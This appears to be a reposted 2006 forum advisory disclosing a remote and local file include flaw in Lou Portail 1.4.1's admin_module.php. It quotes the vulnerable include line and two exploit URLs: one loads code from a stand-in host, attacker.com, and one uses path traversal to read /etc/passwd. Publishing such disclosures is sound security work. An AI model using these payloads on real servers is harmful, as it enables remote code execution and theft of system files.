Lou Portail 1.4.1 (admin_module.php) Remote File Include Vulnerability
[code]## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
# #
# [ Lou Portail 1.4.1 ] #
#
# Class: Remote|Local File Include Vulnerability #
# Patch: Unavailable #
# Published 2006/10/18 #
# Remote: Yes
# Local: No #
# Type: High #
# Site: [url]http://louportail.free.fr/[/url] #
# Author: MP
# Contact: [email]mp01010@yahoo.com[/email] #
# #
#################################################################
Vuln Code (admin/admin_module.php):
<?...
include ("$g_admin_rep/admin_utils.$g_ext");
...?>
#Vuln 1.0 -> require register_globals = On
[url]http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt[/url]
#Vuln 2.0 -> require magic_quotes_gpc = Off
[url]http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00[/url]
[/code]
页:
[1]